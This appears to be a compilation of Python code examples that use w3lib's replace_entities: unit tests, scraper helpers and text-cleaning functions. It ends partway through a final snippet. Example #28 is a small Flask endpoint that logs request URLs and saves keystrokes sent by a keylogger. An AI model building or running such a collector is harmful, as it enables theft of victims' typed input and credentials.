def extract_regex(regex, text, encoding='utf-8'):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract", that group is returned
    * if the regex contains multiple numbered groups, all of them are returned (flattened)
    * if the regex doesn't contain any group, the entire match is returned
    """
    warnings.warn(
        "scrapy.utils.misc.extract_regex has moved to parsel.utils.extract_regex.",
        ScrapyDeprecationWarning,
        stacklevel=2
    )

    if isinstance(regex, str):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group('extract')]   # named group
    except Exception:
        strings = regex.findall(text)    # full regex or numbered groups
    strings = flatten(strings)

    if isinstance(text, str):
        return [replace_entities(s, keep=['lt', 'amp']) for s in strings]
    else:
        return [replace_entities(to_unicode(s, encoding), keep=['lt', 'amp'])
                for s in strings]
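A quick interpreter sketch of the three policies (illustrative calls, not part of the original project):

>>> # a named group called "extract" wins
>>> extract_regex(r'Price: (?P<extract>\d+)', 'Price: 100 GBP')
['100']
>>> # multiple numbered groups are returned flattened
>>> extract_regex(r'(\d+)x(\d+)', 'sizes 10x20 and 30x40')
['10', '20', '30', '40']
>>> # no groups: the full matches are returned
>>> extract_regex(r'\d+x\d+', 'sizes 10x20 and 30x40')
['10x20', '30x40']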
Example #2
 def test_regular(self):
     # regular conversions
     self.assertEqual(replace_entities(u'As low as &#163;100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities(b'As low as &#163;100!'),
                      u'As low as \xa3100!')
     self.assertEqual(replace_entities('redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL &amp; SEASONAL-_-MR0221Y-_-9-carat gold &frac12;oz solid crucifix pendant'),
                      u'redirectTo=search&searchtext=MR0221Y&aff=buyat&affsrc=d_data&cm_mmc=buyat-_-ELECTRICAL & SEASONAL-_-MR0221Y-_-9-carat gold \xbdoz solid crucifix pendant')
Example #4
 def test_returns_unicode(self):
     # make sure it always returns unicode
     assert isinstance(replace_entities(b'no entities'), six.text_type)
     assert isinstance(replace_entities(b'Price: &pound;100!'),
                       six.text_type)
     assert isinstance(replace_entities(u'no entities'), six.text_type)
     assert isinstance(replace_entities(u'Price: &pound;100!'),
                       six.text_type)
Example #5
 def test_illegal_entities(self):
     self.assertEqual(replace_entities('a &lt; b &illegal; c &#12345678; six', remove_illegal=False),
                      u'a < b &illegal; c &#12345678; six')
     self.assertEqual(replace_entities('a &lt; b &illegal; c &#12345678; six', remove_illegal=True),
                      u'a < b  c  six')
     self.assertEqual(replace_entities('x&#x2264;y'), u'x\u2264y')
     self.assertEqual(replace_entities('x&#157;y'), u'xy')
     self.assertEqual(replace_entities('x&#157;y', remove_illegal=False), u'x&#157;y')
Example #6
 def test_illegal_entities(self):
     self.assertEqual(
         replace_entities('a &lt; b &illegal; c &#12345678; six',
                          remove_illegal=False),
         u'a < b &illegal; c &#12345678; six')
     self.assertEqual(
         replace_entities('a &lt; b &illegal; c &#12345678; six',
                          remove_illegal=True), u'a < b  c  six')
     self.assertEqual(replace_entities('x&#x2264;y'), u'x\u2264y')
Example #7
 def test_missing_semicolon(self):
     for entity, result in (
         (
             '&lt&lt!',
             '<<!',
         ),
         (
             '&LT!',
             '<!',
         ),
         (
             '&#X41 ',
             'A ',
         ),
         (
             '&#x41!',
             'A!',
         ),
         (
             '&#x41h',
             'Ah',
         ),
         (
             '&#65!',
             'A!',
         ),
         (
             '&#65x',
             'Ax',
         ),
         (
             '&sup3!',
             '\u00B3!',
         ),
         (
             '&Aacute!',
             '\u00C1!',
         ),
         (
             '&#9731!',
             '\u2603!',
         ),
         (
             '&#153',
             '\u2122',
         ),
         (
             '&#x99',
             '\u2122',
         ),
     ):
         self.assertEqual(replace_entities(entity, encoding='cp1252'),
                          result)
         self.assertEqual(
             replace_entities('x%sy' % entity, encoding='cp1252'),
             'x%sy' % result)
Example #8
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(
         replace_entities(b'<b>Low &lt; High &amp; Medium &pound; six</b>',
                          keep=['lt', 'amp']),
         '<b>Low &lt; High &amp; Medium \xa3 six</b>')
     self.assertEqual(
         replace_entities('<b>Low &lt; High &amp; Medium &pound; six</b>',
                          keep=['lt', 'amp']),
         '<b>Low &lt; High &amp; Medium \xa3 six</b>')
Example #9
 def test_missing_semicolon(self):
     for entity, result in (
         (
             "&lt&lt!",
             "<<!",
         ),
         (
             "&LT!",
             "<!",
         ),
         (
             "&#X41 ",
             "A ",
         ),
         (
             "&#x41!",
             "A!",
         ),
         (
             "&#x41h",
             "Ah",
         ),
         (
             "&#65!",
             "A!",
         ),
         (
             "&#65x",
             "Ax",
         ),
         (
             "&sup3!",
             "\u00B3!",
         ),
         (
             "&Aacute!",
             "\u00C1!",
         ),
         (
             "&#9731!",
             "\u2603!",
         ),
         (
             "&#153",
             "\u2122",
         ),
         (
             "&#x99",
             "\u2122",
         ),
     ):
         self.assertEqual(replace_entities(entity, encoding="cp1252"), result)
         self.assertEqual(
             replace_entities(f"x{entity}y", encoding="cp1252"), f"x{result}y"
         )
Example #10
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(
         replace_entities(b"<b>Low &lt; High &amp; Medium &pound; six</b>",
                          keep=["lt", "amp"]),
         "<b>Low &lt; High &amp; Medium \xa3 six</b>",
     )
     self.assertEqual(
         replace_entities("<b>Low &lt; High &amp; Medium &pound; six</b>",
                          keep=["lt", "amp"]),
         "<b>Low &lt; High &amp; Medium \xa3 six</b>",
     )
Example #11
 def test_illegal_entities(self):
     self.assertEqual(
         replace_entities("a &lt; b &illegal; c &#12345678; six",
                          remove_illegal=False),
         "a < b &illegal; c &#12345678; six",
     )
     self.assertEqual(
         replace_entities("a &lt; b &illegal; c &#12345678; six",
                          remove_illegal=True),
         "a < b  c  six",
     )
     self.assertEqual(replace_entities("x&#x2264;y"), "x\u2264y")
     self.assertEqual(replace_entities("x&#157;y"), "xy")
     self.assertEqual(replace_entities("x&#157;y", remove_illegal=False),
                      "x&#157;y")
Example #12
 def clean_url(url):
     # base_url and response_encoding come from the enclosing link-extractor scope (cf. Example #36)
     clean_url = ''
     try:
         clean_url = urljoin(base_url, replace_entities(clean_link(url.decode(response_encoding))))
     except ValueError:
         pass
     return clean_url
Example #13
    def process(self, data, url_object):
        """Process HTML data.

        Replaces entities and removes tags (except comments) before
        processing with TextProcessor.
        """
        logging.info("Process HTML %s" % url_object.url)
        try:
            encoding, data = get_codec_and_string(data)
            # Remove style tags to avoid false positives from inline styles
            data = remove_tags_with_content(data, which_ones=('style',))
        except UnicodeDecodeError as ude:
            logging.error('UnicodeDecodeError in handle_error_method: {}'.format(ude))
            logging.error('Error happened for file: {}'.format(url_object.url))
            return False

        # Convert HTML entities to their unicode representation
        entity_replaced_html = replace_entities(data)

        # Collapse whitespace (including newlines), since extra whitespace is
        # not significant in HTML (except inside comment tags)
        collapsed_html = _whitespace_re.sub(' ', entity_replaced_html)

        # Replace tags with <> character to make sure text processor
        # doesn't match across tag boundaries.
        replace_tags_text = _html_tag_re.sub('<>', collapsed_html)

        return self.text_processor.process(replace_tags_text, url_object)
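The module-level regexes are defined elsewhere in that project; below is a minimal sketch of what the three transforms do, assuming _whitespace_re matches whitespace runs and _html_tag_re matches single tags:

import re
from w3lib.html import replace_entities

_whitespace_re = re.compile(r'\s+')    # assumed definition
_html_tag_re = re.compile(r'<[^>]+>')  # assumed definition

data = '<p>Low &amp;\n   slow</p>'
step1 = replace_entities(data)          # '<p>Low &\n   slow</p>'
step2 = _whitespace_re.sub(' ', step1)  # '<p>Low & slow</p>'
step3 = _html_tag_re.sub('<>', step2)   # '<>Low & slow<>'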
Example #14
def remove_garbage(val):
    val = replace_escape_chars(val)
    val = replace_entities(val)
    val = re.sub(r'\.', '. ', val)
    val = re.sub(r'\s+,\s{2,}', ', ', val)
    val = re.sub(r'\s{2,}', ' ', val)
    return val.strip()
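An illustrative call (made-up input): escape chars and entities are stripped, then spacing after periods is normalized.

remove_garbage('9ct gold.Hallmarked &amp; boxed')   # -> '9ct gold. Hallmarked & boxed'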
Example #15
def normalize_web_content(x, keep=('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'strong'),
                          token='____SECTION____'):
    """Normalize web content.

    Parameters
    ----------
    x : str
        Raw web content (HTML) to normalize.
    keep : tuple
        HTML tags to keep.
    token : str or None
        Token to use for replacing kept HTML tags.
        Do not replace if `None`.
    """
    try:
        x = strip_html5_whitespace(x)
        x = remove_comments(x)
        x = remove_tags(x, keep=keep)
        if token:
            x = replace_tags(x, token=token)
        x = replace_entities(x)
        x = replace_escape_chars(x)
    except (TypeError, AttributeError):
        pass
    for part in _rx_web_sectionize.split(x):
        if part:
            yield part
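A hedged usage sketch; _rx_web_sectionize lives elsewhere in that project and is assumed here to split on the section token:

import re
from w3lib.html import (strip_html5_whitespace, remove_comments, remove_tags,
                        replace_tags, replace_entities, replace_escape_chars)

_rx_web_sectionize = re.compile(r'____SECTION____')  # assumed definition

html = '<h1>Title</h1><p>Fish &amp; chips</p>'
print(list(normalize_web_content(html)))
# roughly ['Title', 'Fish & chips']: the kept <h1> tags become section
# tokens, other tags are dropped, entities are replaced, and the text
# is split on the token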
Example #16
def clearText(inputTextFile, outputTextFile, outputErr):
    input = open(inputTextFile, 'rb')
    sc = chardet.detect(input.read())
    input.close()
    #print(inputTextFile,sc)
    # if sc["encoding"] != None:
    #     outputErr.write(path+"\n")
    if sc["encoding"] != None and sc["confidence"] > 0.5:
        input = open(inputTextFile, 'r', encoding=sc["encoding"])
        output = open(outputTextFile, 'w', encoding="utf-8")
        try:
            text = input.read()
        except Exception as e:
            print(e)
            outputErr = open("C:\\ErrorFiles.log", 'a', encoding="utf-8")
            outputErr.write(inputTextFile + " | " + outputTextFile + "\n")
            outputErr.close()
            return
        text = replace_entities(text)
        PUNCTUATION = ''  #u'…»«—№’'
        RU_ALPHABET = u'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдеёжзийклмнопрстуфхцчшщъыьэюя'
        final_new_text = re.sub(
            "[^{}]+".format(printable + PUNCTUATION + RU_ALPHABET), "", text)
        final_new_text = re.sub(r'\s+', ' ', final_new_text)
        for c in list(PUNCTUATION):
            final_new_text = final_new_text.replace(c, ' ' + c + ' ')
        # str.replace returns a new string, so the result must be reassigned
        final_new_text = final_new_text.replace(u'\xa0', ' ')
        output.write(final_new_text)
        output.close()
        input.close()
    else:
        outputErr.write(inputTextFile + "\n")
Example #17
def text(region):
    """Converts HTML to text. There is no attempt at formatting other than
    removing excessive whitespace,

    For example:
    >>> t = lambda s: text(htmlregion(s))
    >>> t(u'<h1>test</h1>')
    u'test'

    Leading and trailing whitespace are removed
    >>> t(u'<h1> test</h1> ')
    u'test'

    Comments are removed
    >>> t(u'test <!-- this is a comment --> me')
    u'test me'

    Text between script tags is ignored
    >>> t(u"scripts are<script>n't</script> ignored")
    u'scripts are ignored'

    HTML entities are converted to text
    >>> t(u"only &pound;42")
    u'only \\xa342'

    >>> t(u"<p>The text</p><?xml:namespace blabla/><p>is here</p>")
    u'The text is here'
    """
    text = replace_entities(region.text_content, encoding=region.htmlpage.encoding)
    return _WS.sub(u' ', text).strip()
Example #18
def queryPreprocessing(query, args):
    # regular expressions
    p_tag_comment = re.compile(r'(<.*?>|<!--.*-->)')
    p_alpha_digit = re.compile(r'\b([a-z]+)-([0-9]+)\b', re.I)
    p_digit_alpha = re.compile(r'\b([0-9]+)-([a-z]+)\b', re.I)
    p_dot_acronym = re.compile(r'\b([a-z]+\.)+[a-z]+(\.|\b)', re.I)
    p_date = re.compile(
        r"""\b
		([0-9]{1,2}/[0-9]{1,2}/[0-9]{2,4})
		|([0-9]{1,2}-[0-9]{1,2}-[0-9]{2,4})
		|(((Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)[.]?
		|January|February|March|April|May|June|July|August
		|September|October|November|December)
		\ [0-9]{1,2}(st|nd|rd|th)?,\ [0-9]{2,4})
	 	\b""", re.VERBOSE | re.I)
    p_docno = re.compile(r'(?:<DOCNO>\s*)(.+)(?:\s*</DOCNO>)', re.I)
    p_num1 = re.compile(r',([0-9]{3})')
    p_num2 = re.compile(r'\b(\d+)[.]0+\b')
    p_file_extension = re.compile(
        r'([^\\\/:*?\"<>|\s]+)\.(aif|cda|mid|midi|mp3|mpa|ogg|wav|wma|wpl|7z|arj|deb|pkg|rar|rpm|tar\.gz|z|zip|bin|dmg|iso|toast|vcd|csv|dat|db|dbf|log|mdb|sav|sql|tar|xml|apk|bat|bin|cgi|pl|com|exe|gadget|jar|py|wsf|fnt|fon|otf|ttf|ai|bmp|gif|ico|jpeg|jpg|png|ps|psd|svg|tif|tiff|asp|aspx|cer|cfm|css|htm|html|js|jsp|part|php|rss|xhtml|key|odp|pps|ppt|pptx|class|cpp|cs|h|java|sh|swift|vb|ods|xlr|xls|xlsx|bak|cab|cfg|cpl|cur|dll|dmp|drv|icns|ico|ini|lnk|msi|sys|tmp|3g2|3gp|avi|flv|h264|m4v|mkv|mov|mp4|mpg|mpeg|rm|swf|vob|wmv|doc|docx|odt|pdf|rtf|tex|txt|wks|wps|wpd)',
        re.I)
    p_prefix = re.compile(
        r'\b(a|an|ante|anti|auto|circum|co|com|con|contra|contro|de|dis|en|em|ex|extra|fore|hetero|homo|homeo|hyper|il|im|in|ir|inter|intra|intro|macro|micro|mid|mis|mono|non|omni|over|post|pre|pro|re|semi|sub|super|sym|syn|trans|tri|un|under|uni)-([a-z])+\b',
        re.I)
    p_hyphen = re.compile(r'\b(\w+-)+\w+\b')

    # create a porter stemmer
    stemmer = PorterStemmer()
    # convert all character references (e.g. &gt;, &#62;, &#x3e;) to unicode
    query = replace_entities(query)
    query = html.unescape(query)
    # some queries have '/', need to be handled specifically
    query = query.replace('/', ' / ')
    # convert to lower case
    query = query.lower()
    # expand file extension
    query = p_file_extension.sub(r'\g<1>\g<2> \g<2>', query)
    # ph.D. -> phd
    query = p_dot_acronym.sub(dotAcronym, query)
    # convert date to mm/dd/yyyy format or remove it if invalid
    query = p_date.sub(dateReplace, query)
    # digit format
    query = p_num1.sub(r'\g<1>', query)  # remove ',' in 1,000
    query = p_num2.sub(r'\g<1>', query)  # remove '.00' in 1.00
    # expand digit-alpha format
    query = p_digit_alpha.sub(digitAlpha, query)
    # expand alpha-digit format
    query = p_alpha_digit.sub(alphaDigit, query)
    # expand stem with hyphen prefix
    query = p_prefix.sub(prefixReplace, query)
    # expand hyphenated word
    query = p_hyphen.sub(hyphenReplace, query)
    # tokenize query
    query = nltk.word_tokenize(query)
    # apply Porter Stemmer
    if args.index_type == 'stem':
        query = [stemmer.stem(word) for word in query]
    # remove term not in idx_table (value will be 0 for all retrieval)
    query = [x for x in query if x in idx_table]
    return query
Example #19
def make_table():
    items = []

    for obj in obj_location_list:
        items.append(Item(obj.total_time))

    # Populate the table
    table = ItemTable(items)

    table_html = str(table.__html__().replace("<table>",
                                              '<table class="table">'))
    # print(table_html)
    table_html = replace_entities(table_html)

    # counter1 = count(1)
    # table_html = re.sub('data-target="#demo', lambda m: m.group() + str(next(counter1)), table_html)

    # table_html = table_html.replace("</td></tr>", '</td></tr> <tr> <td colspan="6" class="hiddenRow"style="padding:0!important;"><div class="accordian-body collapse" id="demo"> <ul class="list-group"> [cmmt] </ul> </div></td></tr>')
    # counter2 = count(1)
    # table_html = re.sub('id="demo', lambda m: m.group() + str(next(counter2)), table_html)
    # for key, value in theme_dict.items():
    #     for sub_theme in value:
    #         table_html = table_html.replace('[cmmt]', get_cmmts(sub_theme.theme, theme_dict),1)
    # g.theme_dict = result_list

    return table_html
Example #22
def replace_all_entities(string):
    """ replace all XML entities, even poorly encoded """
    # hack because BGG encodes 'Ü' as '&amp;#195;&amp;#156;' (d'oh!)
    # note that this may corrupt text that's actually encoded correctly!
    return replace_entities(
        replace_utf_entities(
            string.replace("&amp;", "&").replace("&amp;",
                                                 "&").replace("&amp;", "&")))
Example #23
def clean_text(text):
    """Clean text from tags, replace entities and normalize whitespaces"""
    text = remove_tags(text)
    text = replace_entities(text)
    # Normalize whitespace
    text = re.sub(r'(\s)+', '\\1', text)
    # Strip whitespace
    return text.strip()
Example #24
 def test_missing_semicolon(self):
     for entity, result in (
             ('&lt&lt!', '<<!',),
             ('&LT!', '<!',),
             ('&#X41 ', 'A ',),
             ('&#x41!', 'A!',),
             ('&#x41h', 'Ah',),
             ('&#65!', 'A!',),
             ('&#65x', 'Ax',),
             ('&sup3!', u'\u00B3!',),
             ('&Aacute!', u'\u00C1!',),
             ('&#9731!', u'\u2603!',),
             ('&#153', u'\u2122',),
             ('&#x99', u'\u2122',),
             ):
         self.assertEqual(replace_entities(entity, encoding='cp1252'), result)
         self.assertEqual(replace_entities('x%sy' % entity, encoding='cp1252'), u'x%sy' % result)
Example #25
 def re(self, regex):
     if isinstance(regex, types.StringTypes):
         regex = re.compile(regex, re.UNICODE)
     text = self.extract()
     try:
         lst = [regex.search(text).group('extract')]
     except Exception:
         lst = regex.findall(text)
     return [replace_entities(s, keep=['lt', 'amp']) for s in flatten(lst)]
Example #26
def sanitize(iterable):
    # TODO change name and add other options

    iterable = (x.strip() for x in iterable)
    iterable = (re.sub(r'[\n\t\r\s]+', ' ', x) for x in iterable)
    iterable = (x.encode('ascii', errors='ignore').decode('ascii') for x in iterable)
    iterable = (replace_entities(x) for x in iterable)
    iterable = (remove_tags(x) for x in iterable)
    return iterable
Example #27
def sanitize(iterable):
    # TODO change name and add other options

    iterable = (x.strip() for x in iterable)
    iterable = (re.sub(r'[\n\t\r\s]+', ' ', x) for x in iterable)
    iterable = (unidecode(x) for x in iterable)
    iterable = (replace_entities(x) for x in iterable)
    iterable = (remove_tags(x) for x in iterable)
    return iterable
Example #28
def route():
    """Get all GET requests and dump them to logs."""
    # Unescape HTML and write to log.
    with open("cap.log", "a") as f:
        f.write(replace_entities(str(request.url)) + "\n")

    # If we think a keylogger (param: 'c') is trying to get us information...
    with open("key.log", "a") as f:
        if "c" in request.args:
            keys = loads(replace_entities(request.args.get('c')))

            # From the JSON list get only keys pressed. If impossible, stop.
            try:
                keys = "".join(keys)
                f.write(keys + '\n')
            except Exception:
                pass

    return message
Example #29
def clean_text(text):

    # Helper function to clean text data and remove non-printable chars.

    text = text.strip()
    text = re.sub(r'[\n\t\r\s]+', ' ', text)
    text = text.encode('ascii', errors='ignore').decode('ascii')
    text = replace_entities(text)
    text = remove_tags(text)
    return text
Example #30
def extract_raw_text(html):
    text = replace_entities(html)
    text = re_clean_blanks.sub(u' ', text)
    text = re_clean_comments.sub(u' ', text)
    text = re_clean_javascript.sub(u' ', text)
    text = re_clean_style.sub(u' ', text)
    text = re_clean_balises.sub(u' ', text)
    text = re_clean_blanks.sub(u' ', text).strip()
    text = re_clean_multiCR.sub(u'\n', text)
    return text
Example #32
def clean_file(file_name, fields):
    res = []
    with jsonlines.open(file_name) as rdr:
        for line in rdr:
            for f in fields:
                if not line[f]:
                    continue
                line[f] = replace_entities(line[f].replace("\n", "").strip())
            res.append(copy.deepcopy(line))
    return res
Example #33
def clean_text(text):
    """Clean text from tags, replace entities and normalize whitespaces"""
    if not isinstance(text, six.string_types):
        return text
    text = remove_tags(text)
    text = replace_entities(text)
    # Normalize whitespace
    text = re.sub(r'(\s)+', '\\1', text)
    # Strip whitespace
    return text.strip()
Example #34
def image_url(txt):
    """convert text to a url

    this is quite conservative, since relative urls are supported
    Example:

        >>> image_url('')

        >>> image_url('   ')

        >>> image_url(' \\n\\n  ')

        >>> image_url('foo-bar.jpg')
        ['foo-bar.jpg']
        >>> image_url('/images/main_logo12.gif')
        ['/images/main_logo12.gif']
        >>> image_url("http://www.image.com/image.jpg")
        ['http://www.image.com/image.jpg']
        >>> image_url("http://www.domain.com/path1/path2/path3/image.jpg")
        ['http://www.domain.com/path1/path2/path3/image.jpg']
        >>> image_url("/path1/path2/path3/image.jpg")
        ['/path1/path2/path3/image.jpg']
        >>> image_url("path1/path2/image.jpg")
        ['path1/path2/image.jpg']
        >>> image_url("background-image : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background-image : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background-image : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80')
        ['http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80']
        >>> image_url('../image.aspx?thumb=true&amp;boxSize=175&amp;img=Unknoportrait[1].jpg')
        ['../image.aspx?thumb=true&boxSize=175&img=Unknoportrait%5B1%5D.jpg']
        >>> image_url('http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff')
        ['http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff']
        >>> image_url('http://www.site.com/image.php')
        ['http://www.site.com/image.php']
        >>> image_url('background-image:URL(http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&amp;defaultImage=noimage_wasserstrom)')
        ['http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&defaultImage=noimage_wasserstrom']

    """
    imgurl = extract_image_url(txt)
    return [safe_url_string(replace_entities(url(imgurl)))] if imgurl else None
Example #35
 def normalizeTool(cls, html):
     '''
     :param html: str containing HTML markup to be stripped
     :return: the string with the HTML removed
     '''
     removeHtml = w3.replace_escape_chars(w3.replace_entities(
         w3.remove_tags(html)),
                                          replace_by=" ")
     # removeHtml = w3.replace_escape_chars(w3.replace_entities(w3.remove_tags(html)))
     removeEscapeChars = " ".join(removeHtml.split())
     return removeEscapeChars
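The same pipeline outside the class (w3 is w3lib.html, as imported in that project; the sample string is made up):

import w3lib.html as w3

s = w3.replace_escape_chars(
    w3.replace_entities(w3.remove_tags('<p>Fish &amp; chips\napp</p>')),
    replace_by=' ')
print(' '.join(s.split()))   # -> 'Fish & chips app'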
Example #36
File: regex.py Project: 0326/scrapy
    def _extract_links(self, response_text, response_url, response_encoding, base_url=None):
        if base_url is None:
            base_url = urljoin(response_url, self.base_url) if self.base_url else response_url

        clean_url = lambda u: urljoin(base_url, replace_entities(clean_link(u.decode(response_encoding))))
        clean_text = lambda t: replace_escape_chars(remove_tags(t.decode(response_encoding))).strip()

        links_text = linkre.findall(response_text)
        return [Link(clean_url(url).encode(response_encoding),
                     clean_text(text))
                for url, _, text in links_text]
Example #37
def image_url(txt):
    """convert text to a url

    this is quite conservative, since relative urls are supported
    Example:

        >>> image_url('')

        >>> image_url('   ')

        >>> image_url(' \\n\\n  ')

        >>> image_url('foo-bar.jpg')
        ['foo-bar.jpg']
        >>> image_url('/images/main_logo12.gif')
        ['/images/main_logo12.gif']
        >>> image_url("http://www.image.com/image.jpg")
        ['http://www.image.com/image.jpg']
        >>> image_url("http://www.domain.com/path1/path2/path3/image.jpg")
        ['http://www.domain.com/path1/path2/path3/image.jpg']
        >>> image_url("/path1/path2/path3/image.jpg")
        ['/path1/path2/path3/image.jpg']
        >>> image_url("path1/path2/image.jpg")
        ['path1/path2/image.jpg']
        >>> image_url("background-image : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background-image : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background-image : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url(http://www.site.com/path1/path2/image.jpg)")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url("background : url('http://www.site.com/path1/path2/image.jpg')")
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('background : url("http://www.site.com/path1/path2/image.jpg")')
        ['http://www.site.com/path1/path2/image.jpg']
        >>> image_url('/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350')
        ['http://www.site.com/getimage.php?image=totalgardens/outbbq2_400.jpg&type=prod&resizeto=350']
        >>> image_url('http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80')
        ['http://s7d4.scene7.com/is/image/Kohler/jaa03267?hei=425&wid=457&op_usm=2,1,2,1&qlt=80']
        >>> image_url('../image.aspx?thumb=true&amp;boxSize=175&amp;img=Unknoportrait[1].jpg')
        ['../image.aspx?thumb=true&boxSize=175&img=Unknoportrait[1].jpg']
        >>> image_url('http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff')
        ['http://www.sundancecatalog.com/mgen/catalog/test.ms?args=%2245932|MERIDIAN+PENDANT|.jpg%22&is=336,336,0xffffff']
        >>> image_url('http://www.site.com/image.php')
        ['http://www.site.com/image.php']
        >>> image_url('background-image:URL(http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&amp;defaultImage=noimage_wasserstrom)')
        ['http://s7d5.scene7.com/is/image/wasserstrom/165133?wid=227&hei=227&defaultImage=noimage_wasserstrom']

    """
    imgurl = extract_image_url(txt)
    return [safe_url_string(replace_entities(url(imgurl)))] if imgurl else None
Example #38
def extract_regex(regex, text, encoding="utf-8"):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract", that group is returned
    * if the regex contains multiple numbered groups, all of them are returned (flattened)
    * if the regex doesn't contain any group, the entire match is returned
    """

    if isinstance(regex, six.string_types):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group("extract")]  # named group
    except Exception:
        strings = regex.findall(text)  # full regex or numbered groups
    strings = flatten(strings)

    if isinstance(text, six.text_type):
        return [replace_entities(s, keep=["lt", "amp"]) for s in strings]
    else:
        return [replace_entities(to_unicode(s, encoding), keep=["lt", "amp"]) for s in strings]
Example #39
def extract_regex(regex, text, encoding='utf-8'):
    """Extract a list of unicode strings from the given text/encoding using the following policies:

    * if the regex contains a named group called "extract", that group is returned
    * if the regex contains multiple numbered groups, all of them are returned (flattened)
    * if the regex doesn't contain any group, the entire match is returned
    """

    if isinstance(regex, basestring):
        regex = re.compile(regex, re.UNICODE)

    try:
        strings = [regex.search(text).group('extract')]   # named group
    except Exception:
        strings = regex.findall(text)    # full regex or numbered groups
    strings = flatten(strings)
    # flatten removes nested structures (lists inside lists, etc.) and returns one flat list
    if isinstance(text, unicode):
        return [replace_entities(s, keep=['lt', 'amp']) for s in strings]
    else:
        return [replace_entities(unicode(s, encoding), keep=['lt', 'amp']) for s in strings]
Example #40
    def parse_item(self, response):
        links = dict()
        link_titles = set()

        url = response.url.split('#')[0].lower()
        url_head = url.split('/pages/')[0] + '/pages/'

        title = response.xpath('//meta[@name="DC.title"]/@content').extract_first()
        if title and title.endswith('- NHS Choices'):
            # strip the "- NHS Choices" suffix (rstrip would remove characters, not the suffix)
            title = title[:-len('- NHS Choices')].strip()
        subjects = response.xpath('//meta[@name="DC.Subject"][@scheme="NHSC.Ontology"]/@content').extract_first().split(', ')
        subjects = [s.lower() for s in subjects if s]
        if not subjects:
            subjects = [title.lower()]
        description = clean_text(response.xpath('//meta[@name="DC.description"]/@content').extract_first())
        raw_page_content = response.xpath('//div[@class="main-content healthaz-content clear"]/.').extract_first()
        page_content = clean_text(replace_entities(remove_tags(raw_page_content)))
        for a in response.xpath('//div[@class="main-content healthaz-content clear"]/descendant::a'):
            label = a.xpath('text()').extract_first()
            href = a.xpath('@href').extract_first()
            if href and label:
                href = self.base_url + href.lstrip('/')
                href = href.lower()
                label = clean_text(label)
                if '/conditions/' in href and url_head not in href:
                    link_titles.add(label)
                    if href in links:
                        links[href]['count'] += 1
                    else:
                        links[href] = {
                            'count': 1,
                            'label': label
                        }
                if url_head in href and href != url:
                    print("********************", href)
                    yield scrapy.Request(href, self.parse_item)

        article = NhsItem()
        article['url'] = url
        article['title'] = title
        article['subjects'] = subjects
        article['description'] = description
        article['page_content'] = str(page_content)
        article['links'] = links
        article['link_titles'] = list(link_titles)
        yield article
Example #41
def _has_ajaxcrawlable_meta(text):
    """
    >>> _has_ajaxcrawlable_meta('<html><head><meta name="fragment"  content="!"/></head><body></body></html>')
    True
    >>> _has_ajaxcrawlable_meta("<html><head><meta name='fragment' content='!'></head></html>")
    True
    >>> _has_ajaxcrawlable_meta('<html><head><!--<meta name="fragment"  content="!"/>--></head><body></body></html>')
    False
    >>> _has_ajaxcrawlable_meta('<html></html>')
    False
    """

    # Stripping scripts and comments is slow (about 20x slower than
